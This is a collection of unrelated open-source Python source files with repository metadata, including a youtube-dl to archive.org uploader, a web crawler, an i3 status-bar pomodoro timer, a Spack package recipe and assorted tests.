'ignoreerrors': True, # Geo-blocked,
# copyrighted/private/deleted
# will be printed to STDOUT and channel
                                   # ripping will continue uninterrupted,
# use with verbose off
'fixup': 'warn', # Slightly more verbosity for debugging
# problems
'nooverwrites': True, # Don't touch what's already been
                                   # downloaded; speeds things up
'consoletitle': True, # Download percentage in console title
'prefer_ffmpeg': True, # `ffmpeg` is better than `avconv`,
# let's prefer it's use
# Warns on out of date youtube-dl script, helps debugging for
# youtube-dl devs
'call_home': False,
'logger': self.logger,
'progress_hooks': [ydl_progress_hook]
}
if cookie_file is not None:
ydl_opts['cookiefile'] = cookie_file
if proxy_url is not None:
ydl_opts['proxy'] = proxy_url
if ydl_username is not None:
ydl_opts['username'] = ydl_username
if ydl_password is not None:
ydl_opts['password'] = ydl_password
if use_download_archive:
ydl_opts['download_archive'] = os.path.join(self.dir_path['root'],
'.ytdlarchive')
return ydl_opts
def upload_ia(self, videobasename, custom_meta=None):
"""
Upload video to archive.org.
:param videobasename: A video base name.
:param custom_meta: A custom meta, will be used by internetarchive
library when uploading to archive.org.
:return: A tuple containing item name and metadata used
when uploading to archive.org.
"""
json_metadata_filepath = videobasename + '.info.json'
with open(json_metadata_filepath) as f:
vid_meta = json.load(f)
itemname = ('%s-%s' % (vid_meta['extractor'],
vid_meta['display_id']))
# Exit if video download did not complete, don't upload .part files to IA
if glob.glob(videobasename + '*.part'):
            msg = 'Video download incomplete, re-attempt archival later, exiting...'
raise Exception(msg)
        # Replace illegal characters within the identifier
itemname = sanitize_identifier(itemname)
metadata = self.create_archive_org_metadata_from_youtubedl_meta(
vid_meta)
# Delete empty description file
description_file_path = videobasename + '.description'
if (os.path.exists(description_file_path) and
(('description' in vid_meta and
vid_meta['description'] == '') or
check_is_file_empty(description_file_path))):
os.remove(description_file_path)
# Delete empty annotations.xml file so it isn't uploaded
annotations_file_path = videobasename + '.annotations.xml'
if (os.path.exists(annotations_file_path) and
(('annotations' in vid_meta and
vid_meta['annotations'] in {'', EMPTY_ANNOTATION_FILE}) or
check_is_file_empty(annotations_file_path))):
os.remove(annotations_file_path)
# Upload all files with videobase name: e.g. video.mp4,
# video.info.json, video.srt, etc.
files_to_upload = glob.glob(videobasename + '*')
# Upload the item to the Internet Archive
item = internetarchive.get_item(itemname)
if custom_meta:
metadata.update(custom_meta)
# Parse internetarchive configuration file.
parsed_ia_s3_config = parse_config_file(self.ia_config_path)[1]['s3']
s3_access_key = parsed_ia_s3_config['access']
s3_secret_key = parsed_ia_s3_config['secret']
if None in {s3_access_key, s3_secret_key}:
msg = ('`internetarchive` configuration file is not configured'
' properly.')
self.logger.error(msg)
if self.verbose:
print(msg)
raise Exception(msg)
item.upload(files_to_upload, metadata=metadata, retries=9001,
request_kwargs=dict(timeout=9001), delete=True,
verbose=self.verbose, access_key=s3_access_key,
secret_key=s3_secret_key)
return itemname, metadata
def archive_urls(self, urls, custom_meta=None,
cookie_file=None, proxy=None,
ydl_username=None, ydl_password=None,
use_download_archive=False):
"""
Download and upload videos from youtube_dl supported sites to
archive.org
:param urls: List of url that will be downloaded and uploaded
to archive.org
:param custom_meta: A custom metadata that will be used when
uploading the file with archive.org.
:param cookie_file: A cookie file for YoutubeDL.
:param proxy_url: A proxy url for YoutubeDL.
:param ydl_username: Username that will be used to download the
resources with youtube_dl.
:param ydl_password: Password of the related username, will be used
to download the resources with youtube_dl.
:param use_download_archive: Record the video url to the download archive.
This will download only videos not listed in
the archive file. Record the IDs of all
downloaded videos in it.
:return: Tuple containing identifier and metadata of the
file that has been uploaded to archive.org.
"""
downloaded_file_basenames = self.get_resource_basenames(
urls, cookie_file, proxy, ydl_username, ydl_password, use_download_archive)
for basename in downloaded_file_basenames:
identifier, meta = self.upload_ia(basename, custom_meta)
yield identifier, meta
@staticmethod
def determine_collection_type(url):
"""
Determine collection type for an url.
:param url: URL that the collection type will be determined.
:return: String, name of a collection.
"""
if urlparse(url).netloc == 'soundcloud.com':
return 'opensource_audio'
return 'opensource_movies'
@staticmethod
def determine_licenseurl(vid_meta):
"""
Determine licenseurl for an url
:param vid_meta:
:return:
"""
licenseurl = ''
licenses = {
"Creative Commons Attribution license (reuse allowed)": "https://creativecommons.org/licenses/by/3.0/",
"Attribution-NonCommercial-ShareAlike": "https://creativecommons.org/licenses/by-nc-sa/2.0/",
"Attribution-NonCommercial": "https://creativecommons.org/licenses/by-nc/2.0/",
"Attribution-NonCommercial-NoDerivs": "https://creativecommons.org/licenses/by-nc-nd/2.0/",
"Attribution": "https://creativecommons.org/licenses/by/2.0/",
"Attribution-ShareAlike": "https://creativecommons.org/licenses/by-sa/2.0/",
"Attribution-NoDerivs": "https://creativecommons.org/licenses/by-nd/2.0/"
}
if 'license' in vid_meta and vid_meta['license']:
licenseurl = licenses.get(vid_meta['license'])
return licenseurl
@staticmethod
def create_archive_org_metadata_from_youtubedl_meta(vid_meta):
"""
Create an archive.org from youtubedl-generated metadata.
:param vid_meta: A dict containing youtubedl-generated metadata.
:return: A dict containing metadata to be used by
internetarchive library.
"""
title = '%s' % (vid_meta['title'])
videourl = vid_meta['webpage_url']
collection = TubeUp.determine_collection_type(videourl)
# Some video services don't tell you the uploader,
# use our program's name in that case.
try:
if vid_meta['extractor_key'] == 'TwitchClips' and 'creator' in vid_meta and vid_meta['creator']:
uploader = vid_meta['creator']
elif 'uploader' in vid_meta and vid_meta['uploader']:
uploader = vid_meta['uploader']
elif 'uploader_url' in vid_meta and vid_meta['uploader_url']:
uploader = vid_meta['uploader_url']
else:
uploader = 'tubeup.py'
except TypeError: # apparently uploader is null as well
uploader = 'tubeup.py'
uploader_url = vid_meta.get('uploader_url', videourl)
try: # some videos don't give an upload date
d = datetime.strptime(vid_meta['upload_date'], '%Y%m%d')
upload_date = d.isoformat().split('T')[0]
upload_year = upload_date[:4] # 20150614 -> 2015
except (KeyError, TypeError):
# Use current date and time as default values
upload_date = time.strftime("%Y-%m-%d")
upload_year = time.strftime("%Y")
# load up tags into an IA compatible semicolon-separated string
# example: Youtube;video;
tags_string = '%s;video;' % vid_meta['extractor_key']
if 'categories' in vid_meta:
# add categories as tags as well, if they exist
try:
for category in vid_meta['categories']:
tags_string += '%s;' % category
except Exception:
print("No categories found.")
if 'tags' in vid_meta: # some video services don't have tags
try:
                if vid_meta['tags'] is None:
tags_string += '%s;' % vid_meta['id']
tags_string += '%s;' % 'video'
else:
for tag in vid_meta['tags']:
tags_string += '%s;' % tag
except Exception:
print("Unable to process tags successfully.")
# license
licenseurl = TubeUp.determine_licenseurl(vid_meta)
# if there is no description don't upload the empty .description file
description_text = vid_meta.get('description', '')
if description_text is None:
description_text = ''
# archive.org does not display raw newlines
description_text = re.sub('\r?\n', '<br>', description_text)
description = ('{0} <br/><br/>Source: <a href="{1}">{2}</a>'
'<br/>Uploader: <a href="{3}">{4}</a>').format(
description_text, videourl, videourl, uploader_url, uploader)
metadata = dict(
mediatype=('audio' if collection == 'opensource_audio'
else 'movies'),
creator=uploader,
collection=collection,
title=title,
description=description,
date=upload_date,
year=upload_year,
subject=tags_string,
originalurl=videourl,
licenseurl=licenseurl,
# Set 'scanner' metadata pair to allow tracking of TubeUp
# powered uploads, per request from archive.org
scanner='TubeUp Video Stream Mirroring Application {}'.format(__version__))
return metadata
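# Illustrative sketch (added note, not part of the original module): one
# assumed way to drive the class from a script. The URL is a placeholder, and
# a real run needs network access plus an `internetarchive` configuration.
#
#     tu = TubeUp(verbose=True)
#     for identifier, meta in tu.archive_urls(['https://example.com/video']):
#         print(identifier, meta.get('title'))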
| bibanon/tubeup | tubeup/TubeUp.py | Python | gpl-3.0 | 21,687 |
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkMultiGroupProbeFilter(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkMultiGroupProbeFilter(), 'Processing.',
('vtkDataSet', 'vtkDataObject'), ('vtkDataSet',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
| nagyistoce/devide | modules/vtk_basic/vtkMultiGroupProbeFilter.py | Python | bsd-3-clause | 517 |
from ._plntll_ec import EcuaciónEdad
class FuncDías(EcuaciónEdad):
"""
Edad por día.
"""
nombre = 'Días'
def eval(símismo, paso, sim):
return paso
| julienmalard/Tikon | tikon/móds/rae/orgs/ecs/edad/días.py | Python | agpl-3.0 | 184 |
#!/usr/bin/env python
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This is generated, do not edit. Update BuildConfigGenerator.groovy and
# 3ppFetch.template instead.
from __future__ import print_function
import argparse
import json
import os
_FILE_URL = 'https://dl.google.com/dl/android/maven2/com/google/android/datatransport/transport-api/2.2.1/transport-api-2.2.1.aar'
_FILE_NAME = 'transport-api-2.2.1.aar'
_FILE_VERSION = '2.2.1'
def do_latest():
print(_FILE_VERSION)
def get_download_url(version):
if _FILE_URL.endswith('.jar'):
ext = '.jar'
elif _FILE_URL.endswith('.aar'):
ext = '.aar'
else:
raise Exception('Unsupported extension for %s' % _FILE_URL)
partial_manifest = {
'url': [_FILE_URL],
'name': [_FILE_NAME],
'ext': ext,
}
print(json.dumps(partial_manifest))
def main():
ap = argparse.ArgumentParser()
sub = ap.add_subparsers()
latest = sub.add_parser("latest")
latest.set_defaults(func=lambda _opts: do_latest())
download = sub.add_parser("get_url")
download.set_defaults(
func=lambda _opts: get_download_url(os.environ['_3PP_VERSION']))
opts = ap.parse_args()
opts.func(opts)
if __name__ == '__main__':
main()
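# Illustrative usage (added note, not part of the original script), based on
# the argparse subcommands defined above:
#
#     $ python3 fetch.py latest
#     2.2.1
#     $ _3PP_VERSION=2.2.1 python3 fetch.py get_url
#     {"url": [...], "name": [...], "ext": ".aar"}   # partial manifest JSON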
| nwjs/chromium.src | third_party/android_deps/libs/com_google_android_datatransport_transport_api/3pp/fetch.py | Python | bsd-3-clause | 1,383 |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^result', views.result, name='result'),
url(r'^$', views.index, name='index'),
]
| mosmeh/danbooru-prediction | prediction/urls.py | Python | mit | 165 |
import socket
try:
import requests
httplib2 = None
except ImportError:
requests = None
try:
import httplib2
except ImportError:
raise ImportError('No module named requests or httplib2')
ConnectionError = requests.exceptions.ConnectionError if requests else socket.error
def wrap_http_connection(http_connection=None):
if not http_connection:
http_connection = requests.Session() if requests else httplib2.Http()
if not is_requests_instance(http_connection):
http_connection = RequestWrapper(http_connection)
return http_connection
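# Illustrative note (added, not from the original file): with no argument this
# is assumed to return either a requests.Session (when requests is importable)
# or a RequestWrapper around httplib2.Http(); both expose the same request()
# call. The URL below is a placeholder.
#
#     conn = wrap_http_connection()
#     response = conn.request('GET', 'http://localhost:8983/solr/select?q=*:*')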
def is_requests_instance(obj):
return hasattr(obj, 'get') and hasattr(obj, 'post')
class RequestWrapper(object):
"""
Wraps an `httplib2` instance to make it behave enough like a
`requests` instance for our purposes
"""
def __init__(self, conn):
self.conn = conn
def request(self, method, url, data=None, headers=None):
response, content = self.conn.request(url, method=method, body=data, headers=headers)
return ResponseWrapper(response, content)
class ResponseWrapper(object):
"""
Wraps an `httplib2` response pair to make it behave enough like a
`requests` response object for our purposes
"""
def __init__(self, response, content):
self.status_code = response.status
self.content = content
| tow/sunburnt | sunburnt/http.py | Python | mit | 1,389 |
import subprocess
from datetime import datetime, timedelta
from i3pystatus import IntervalModule
from i3pystatus.core.desktop import DesktopNotification
STOPPED = 0
RUNNING = 1
BREAK = 2
class Pomodoro(IntervalModule):
"""
This plugin shows Pomodoro timer.
Left click starts/restarts timer.
Right click stops it.
Example color settings.
.. code-block:: python
color_map = {
'stopped': '#2ECCFA',
'running': '#FFFF00',
'break': '#37FF00'
}
"""
settings = (
('sound',
'Path to sound file to play as alarm. Played by "aplay" utility'),
('pomodoro_duration',
'Working (pomodoro) interval duration in seconds'),
('break_duration', 'Short break duration in seconds'),
('long_break_duration', 'Long break duration in seconds'),
('short_break_count', 'Short break count before first long break'),
('format', 'format string, available formatters: current_pomodoro, '
'total_pomodoro, time'),
('inactive_format', 'format string to display when no timer is running'),
('color', 'dictionary containing a mapping of statuses to colours')
)
inactive_format = 'Start Pomodoro'
color_map = {
'stopped': '#2ECCFA',
'running': '#FFFF00',
'break': '#37FF00'
}
color = None
sound = None
interval = 1
short_break_count = 3
format = '☯ {current_pomodoro}/{total_pomodoro} {time}'
pomodoro_duration = 25 * 60
break_duration = 5 * 60
long_break_duration = 15 * 60
on_rightclick = "stop"
on_leftclick = "start"
def init(self):
# state could be either running/break or stopped
self.state = STOPPED
self.current_pomodoro = 0
self.total_pomodoro = self.short_break_count + 1 # and 1 long break
self.time = None
if self.color is not None and type(self.color) == dict:
self.color_map.update(self.color)
def run(self):
if self.time and datetime.utcnow() >= self.time:
if self.state == RUNNING:
self.state = BREAK
if self.current_pomodoro == self.short_break_count:
self.time = datetime.utcnow() + \
timedelta(seconds=self.long_break_duration)
else:
self.time = datetime.utcnow() + \
timedelta(seconds=self.break_duration)
text = 'Go for a break!'
else:
self.state = RUNNING
self.time = datetime.utcnow() + \
timedelta(seconds=self.pomodoro_duration)
text = 'Back to work!'
self.current_pomodoro = (self.current_pomodoro + 1) % self.total_pomodoro
self._alarm(text)
if self.state == RUNNING or self.state == BREAK:
min, sec = divmod((self.time - datetime.utcnow()).total_seconds(), 60)
text = '{:02}:{:02}'.format(int(min), int(sec))
sdict = {
'time': text,
'current_pomodoro': self.current_pomodoro + 1,
'total_pomodoro': self.total_pomodoro
}
color = self.color_map['running'] if self.state == RUNNING else self.color_map['break']
text = self.format.format(**sdict)
else:
text = self.inactive_format
color = self.color_map['stopped']
self.output = {
'full_text': text,
'color': color
}
def start(self):
self.state = RUNNING
self.time = datetime.utcnow() + timedelta(seconds=self.pomodoro_duration)
self.current_pomodoro = 0
def stop(self):
self.state = STOPPED
self.time = None
def _alarm(self, text):
notification = DesktopNotification(title='Alarm!', body=text)
notification.display()
if self.sound is not None:
subprocess.Popen(['aplay',
self.sound,
'-q'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
| facetoe/i3pystatus | i3pystatus/pomodoro.py | Python | mit | 4,203 |
import re
import abc
import asyncio
import contextlib
import urllib.parse as urlparse
import aiohttp
import pyquery
from pycrawl.utils import Queue
from pycrawl.http import Request
from pycrawl.http import Response
from pycrawl.middleware import CrawlerMiddlewareManager
class Spider(metaclass=abc.ABCMeta):
def __init__(self, middlewares=None, loop=None, **config):
self.config = config
self._context = {}
self._loop = loop or asyncio.get_event_loop()
self._connector = aiohttp.TCPConnector(loop=self._loop)
self._middlewares = CrawlerMiddlewareManager(self, middlewares)
def enqueue_request(self, **kwargs):
context = self._context[self.task]
max_depth = self.config.get('max_depth')
if max_depth and context['request'].depth > max_depth:
return
request = Request(referer=context['response'], **kwargs)
if request.url in self._seen:
return
if not self._url_allowed(request):
return
request.depth = context['response'].request.depth + 1
self._queue.put_nowait(request)
def _url_allowed(self, request):
return next(
(
True for domain in self.config['domains']
if request.furl.host.endswith(domain)
),
False,
)
@asyncio.coroutine
def start(self):
self._seen = set()
self._queue = Queue(loop=self._loop)
for url in self.config['urls']:
self._queue.put_nowait(Request(url))
workers = [asyncio.Task(self._work()) for _ in range(self.config['concurrency'])]
yield from self._queue.join()
for worker in workers:
worker.cancel()
@asyncio.coroutine
def _work(self):
while True:
request = yield from self._queue.get()
yield from self._fetch(request)
self._queue.task_done()
@asyncio.coroutine
def _fetch(self, request):
for callback in self._middlewares['before_request']:
request = callback(request)
resp = yield from aiohttp.request('GET', request.url, loop=self._loop)
body = yield from resp.read_and_close()
response = Response(request, resp, body)
for callback in self._middlewares['after_response']:
response = callback(response)
        with self._request_context(request, response):
self.parse(response)
@property
    def task(self):
        return asyncio.Task.current_task(loop=self._loop)
@contextlib.contextmanager
def _request_context(self, request, response):
self._context[self.task] = {'request': request, 'response': response}
try:
yield
finally:
del self._context[self.task]
@abc.abstractmethod
def parse(self, response):
pass
class Route:
def __init__(self, pattern, callback):
self.pattern = re.compile(pattern)
self.callback = callback
def filter_urls(self, urls):
return (url for url in urls if self.pattern.search(url))
class RouteSpider(Spider):
def __init__(self, middlewares=None, routes=None, **config):
super().__init__(middlewares=middlewares, **config)
self._routes = routes or []
def route(self, pattern):
def wrapper(callback):
            self._routes.append(Route(pattern, callback))
return callback
return wrapper
def parse(self, response):
route = response.request.meta.get('route')
if route:
route.callback(self, response)
parsed = pyquery.PyQuery(response.content)
elms = parsed('a[href]')
hrefs = elms.map(lambda: urlparse.urljoin(response.request.url, pyquery.PyQuery(this).attr('href')))
for route in self._routes:
for url in route.filter_urls(hrefs):
self.enqueue_request(url=url, route=route)
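# Illustrative sketch (added note, not part of the original module): assumed
# decorator-driven wiring of callbacks into RouteSpider; the domain, URL and
# pattern below are placeholders.
#
#     spider = RouteSpider(domains=['example.com'],
#                          urls=['http://example.com/'], concurrency=2)
#
#     @spider.route(r'/article/\d+')
#     def parse_article(spider, response):
#         print(response.request.url)
#
#     asyncio.get_event_loop().run_until_complete(spider.start())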
| jmcarp/pycrawl | pycrawl/crawl.py | Python | bsd-3-clause | 3,966 |
from muntjac.api import VerticalLayout, Link
from muntjac.terminal.theme_resource import ThemeResource
from muntjac.terminal.external_resource import ExternalResource
class LinkCurrentWindowExample(VerticalLayout):
_CAPTION = 'Open Google'
_TOOLTIP = 'http://www.google.com'
_ICON = ThemeResource('../sampler/icons/icon_world.gif')
def __init__(self):
super(LinkCurrentWindowExample, self).__init__()
self.setSpacing(True)
# Link w/ text and tooltip
l = Link(self._CAPTION, ExternalResource('http://www.google.com'))
l.setDescription(self._TOOLTIP)
self.addComponent(l)
# Link w/ text, icon and tooltip
l = Link(self._CAPTION, ExternalResource('http://www.google.com'))
l.setDescription(self._TOOLTIP)
l.setIcon(self._ICON)
self.addComponent(l)
# Link w/ icon and tooltip
l = Link()
l.setResource(ExternalResource('http://www.google.com'))
l.setDescription(self._TOOLTIP)
l.setIcon(self._ICON)
self.addComponent(l)
| rwl/muntjac | muntjac/demo/sampler/features/link/LinkCurrentWindowExample.py | Python | apache-2.0 | 1,076 |
from django.shortcuts import resolve_url
from django.test import TestCase
from InternetSemLimites.core.models import Provider, State
class TestGet(TestCase):
def setUp(self):
sc, *_ = State.objects.get_or_create(abbr='SC', name='Santa Catarina')
go, *_ = State.objects.get_or_create(abbr='GO', name='Goiás')
props = {'name': 'Xpto',
'url': 'http://xp.to',
'source': 'http://twitter.com/xpto',
'category': Provider.SHAME,
'other': 'Lorem ipsum',
'status': Provider.PUBLISHED}
provider = Provider.objects.create(**props)
provider.coverage.set([sc, go])
self.resp = self.client.get(resolve_url('api:shame'))
def test_get(self):
self.assertEqual(200, self.resp.status_code)
def test_type(self):
self.assertEqual('application/json', self.resp['Content-Type'])
def test_contents(self):
json_resp = self.resp.json()
shame = json_resp['providers']
with self.subTest():
self.assertEqual(1, len(shame))
self.assertNotIn('fame', json_resp)
self.assertEqual('Xpto', shame[0]['name'])
self.assertEqual('http://xp.to', shame[0]['url'])
self.assertEqual('http://twitter.com/xpto', shame[0]['source'])
self.assertEqual(['GO', 'SC'], shame[0]['coverage'])
self.assertEqual('Hall of Shame', shame[0]['category'])
self.assertEqual('Lorem ipsum', shame[0]['other'])
| InternetSemLimites/PublicAPI | InternetSemLimites/api/tests/test_shame_view.py | Python | mit | 1,538 |
import mock
import nengo
import numpy as np
import pytest
from nengo_spinnaker import utils
def test_decoder_generation():
"""Ensure that Decoders are only generated when absolutely necessary!"""
model = nengo.Network()
with model:
a = nengo.Ensemble(100, 3)
b = nengo.Node(lambda t, v: None, size_in=3, size_out=0)
c = nengo.Node(lambda t, v: None, size_in=3, size_out=0)
# Create a series of connections, some identical, some otherwise
c1 = nengo.Connection(a, b)
c2 = nengo.Connection(a, c) # Should share decoder with c1
f = lambda v: v**2
c3 = nengo.Connection(a, b, function=f) # Share ()
c4 = nengo.Connection(a, c, function=f,
transform=np.random.normal(size=(3, 3))) # Share (c3)
c5 = nengo.Connection(a, c, solver=nengo.decoders.LstsqL2()) # Share ()
c6 = nengo.Connection(a, c, eval_points=np.random.normal((100,2))) # !Share
c7 = nengo.Connection(a, c, transform=3)
# Build the decoders in order
decoder_build_func = mock.Mock()
decoder_build_func.return_value = 0.
decoder_builder = utils.decoders.DecoderBuilder(decoder_build_func)
# Build C1, should cause the decoder build func to be called
decoder_builder.get_transformed_decoder(c1.function, c1.transform,
c1.eval_points, c1.solver)
decoder_build_func.assert_called_with(
c1.function, c1.eval_points, c1.solver)
# Build C2, should NOT cause the decoder build func to be called
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c2.function, c2.transform,
c2.eval_points, c2.solver)
assert(not decoder_build_func.called)
# Build C3, should cause the decoder build func to be called
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c3.function, c3.transform,
c3.eval_points, c3.solver)
decoder_build_func.assert_called_with(
c3.function, c3.eval_points, c3.solver)
# Build C4, should NOT ...
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c4.function, c4.transform,
c4.eval_points, c4.solver)
assert(not decoder_build_func.called)
# Build C5, should ...
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c5.function, c5.transform,
c5.eval_points, c5.solver)
decoder_build_func.assert_called_with(
c5.function, c5.eval_points, c5.solver)
# Build C6, should ...
decoder_build_func.reset_mock()
decoder_builder.get_transformed_decoder(c6.function, c6.transform,
c6.eval_points, c6.solver)
decoder_build_func.assert_called_with(
c6.function, c6.eval_points, c6.solver)
# Check that the decoder is transformed
dec = np.random.uniform((3, 100))
decoder_builder = utils.decoders.DecoderBuilder(lambda f, e, s: dec)
tdec = decoder_builder.get_transformed_decoder(c7.function, c7.transform,
c7.eval_points, c7.solver)
assert(np.all(tdec == np.dot(dec, 3)))
def test_get_compressed_decoder():
"""Compressing decoders removes columns from the decoder where all the
values are 0.0 (and hence no neuron ever affects them!). The new decoder
and the indices of the remaining dimensions should be returned.
"""
# Generate a new random decoder, and zero out columns 1, 5, 6
dec = np.random.normal(size=(100, 7))
for d in [0, 4, 5]:
for n in range(100):
dec[n][d] = 0.
# Get a compressed version of the decoder, and a list of used dimensions
(dims, cdec) = utils.decoders.get_compressed_decoder(dec)
assert(dims == [1, 2, 3, 6])
assert(cdec.shape == (100, 4))
assert(cdec[0][0] == dec[0][1])
assert(cdec[0][3] == dec[0][6])
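# Worked toy example (added for clarity, not in the original tests): for
#     dec = [[1., 0., 2.],
#            [3., 0., 4.]]
# column 1 is all zeros, so utils.decoders.get_compressed_decoder(dec) should
# return dims == [0, 2] and the (2, 2) decoder [[1., 2.], [3., 4.]].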
def test_get_compressed_decoders():
"""Should take a list of decoders (and optionally a list of indices and
other attachments), compress the decoders and return a list of
(attachment, index, dimension) tuples.
Attachments are for things like KeySpaces - basically this is compress and
zip.
"""
dec1 = np.array([[1.]*8]*100)
dec2 = np.array([[2.]*10]*100)
# Select which columns to zero out
rdims_1 = set(np.random.randint(7, size=3).tolist())
rdims_2 = set(np.random.randint(8, size=4).tolist())
dims1 = [n for n in range(8) if n not in rdims_1]
dims2 = [n for n in range(10) if n not in rdims_2]
final_length = len(dims1) + len(dims2)
# Zero out those columns
for n in range(100):
for d in rdims_1:
dec1[n][d] = 0.
for d in rdims_2:
dec2[n][d] = 0.
# Construct the compressed decoder
(headers, cdec) = utils.decoders.get_combined_compressed_decoders(
[dec1, dec2])
assert(cdec.shape == (100, final_length))
# Assert the missing dimensions are missing and the decoders were indexed
ids = [(None, 0, d) for d in dims1]
ids.extend([(None, 1, d) for d in dims2])
assert(ids == headers)
def test_get_compressed_decoders_with_indices():
# Construct a set of 7 decoders
n_neurons = 500
decoders = []
dimensions = []
for i in range(7):
n_dims = np.random.randint(3, 10)
dec = np.random.uniform(0.1, 1, size=(n_neurons, n_dims))
# Construct a set of missing dimensions
missing_dims = set(np.random.randint(n_dims,
size=np.random.randint(n_dims/3)))
# Construct the set of present dimensions
dims = [n for n in range(n_dims) if n not in missing_dims]
# Zero the missing dimensions
for n in range(n_neurons):
for d in missing_dims:
dec[n][d] = 0.
decoders.append(dec)
dimensions.append(dims)
# Construct what we expect the header to look like
indices = [8, 7, 6, 5, 4, 3, 9]
expected_headers = []
for (i, ds) in zip(indices, dimensions):
expected_headers.extend([(None, i, d) for d in ds])
# Get the combined compressed decoders and check everything is as expected
headers, cdec = utils.decoders.get_combined_compressed_decoders(
decoders, indices)
assert(cdec.shape == (n_neurons, len(expected_headers)))
assert(headers == expected_headers)
def test_get_compressed_decoders_with_headers():
# Construct a set of 7 decoders
n_neurons = 500
decoders = []
dimensions = []
for i in range(7):
n_dims = np.random.randint(3, 10)
dec = np.random.uniform(0.1, 1, size=(n_neurons, n_dims))
# Construct a set of missing dimensions
missing_dims = set(np.random.randint(n_dims,
size=np.random.randint(n_dims/3)))
# Construct the set of present dimensions
dims = [n for n in range(n_dims) if n not in missing_dims]
# Zero the missing dimensions
for n in range(n_neurons):
for d in missing_dims:
dec[n][d] = 0.
decoders.append(dec)
dimensions.append(dims)
# Construct what we expect the header to look like
headers = "ABCDEFG"
indices = range(7)
expected_headers = []
for (h, i, ds) in zip(headers, indices, dimensions):
expected_headers.extend([(h, i, d) for d in ds])
# Get the combined compressed decoders and check everything is as expected
headers, cdec = utils.decoders.get_combined_compressed_decoders(
decoders, indices, headers)
assert(cdec.shape == (n_neurons, len(expected_headers)))
assert(headers == expected_headers)
def test_get_compressed_and_uncompressed_decoders():
# Construct 3 decoders
d1 = np.random.uniform(.1, 1., (100, 5))
d2 = np.zeros((100, 9))
d3 = np.random.uniform(.1, 1., (100, 7))
# Zero some of the elements of d3
for d in [0, 5]:
for n in range(100):
d3[n][d] = 0.
# Compress the decoders
headers, cdec = utils.decoders.get_combined_compressed_decoders(
[d1, d2, d3], compress=[True, False, True])
# d2 should not have been compressed, d3 should have been
assert(cdec.shape[1] == 5 + 9 + 5)
def test_null_decoders():
headers, cdec = utils.decoders.get_combined_compressed_decoders(
[], headers=[])
| ctn-archive/nengo_spinnaker_2014 | nengo_spinnaker/utils/tests/test_decoders.py | Python | mit | 8,579 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Adms(AutotoolsPackage):
"""ADMS is a code generator that converts electrical compact device models
specified in high-level description language into ready-to-compile c code
for the API of spice simulators."""
homepage = "https://sourceforge.net/projects/mot-adms/"
url = "https://github.com/Qucs/ADMS/releases/download/release-2.3.7/adms-2.3.7.tar.gz"
git = "https://github.com/Qucs/ADMS.git"
maintainers = ['cessenat']
version('master', branch='master')
version('2.3.7', sha256='3a78e1283ecdc3f356410474b3ff44c4dcc82cb89772087fd3bbde8a1038ce08')
depends_on('[email protected]:', type='build')
depends_on('flex', type='build')
depends_on('perl-xml-libxml', type='build')
@when('@master')
def autoreconf(self, spec, prefix):
sh = which('sh')
sh('./bootstrap.sh')
| LLNL/spack | var/spack/repos/builtin/packages/adms/package.py | Python | lgpl-2.1 | 1,052 |
from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from .serializer import UserSerializer, GroupSerializer, ProfileSerializer
from .models import Profile
class UserViewSet(viewsets.ModelViewSet):
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class ProfileViewSet(viewsets.ModelViewSet):
queryset = Profile.objects.all()
serializer_class = ProfileSerializer
class GroupViewSet(viewsets.ModelViewSet):
queryset = Group.objects.all()
serializer_class = GroupSerializer
| Towhidn/django-boilerplate | account/api.py | Python | mit | 557 |
# -*- coding: utf-8 -*-
def uri():
valores = []
par = 0
impar = 0
positivo = 0
negativo = 0
for i in range(0, 5):
valores.append(input())
if(float(valores[i]) % 2 == 0): par += 1
else: impar += 1
if(float(valores[i]) > 0): positivo += 1
elif(float(valores[i]) < 0): negativo += 1
print('{} valor(es) par(es)\n{} valor(es) impar(es)\n{} valor(es) positivo(s)\n{} valor(es) negativo(s)'.format(par, impar, positivo, negativo))
if __name__ == '__main__':
uri()
| gustavolcorreia/uri | iniciante/exerc1066.py | Python | apache-2.0 | 533 |
import pandas.util.testing as tm
class BaseExtensionTests(object):
assert_series_equal = staticmethod(tm.assert_series_equal)
assert_frame_equal = staticmethod(tm.assert_frame_equal)
assert_extension_array_equal = staticmethod(
tm.assert_extension_array_equal
)
| louispotok/pandas | pandas/tests/extension/base/base.py | Python | bsd-3-clause | 288 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import sys
import tempfile
import threading
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, 'getdlopenflags') and hasattr(sys, 'setdlopenflags'):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn import monitors
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
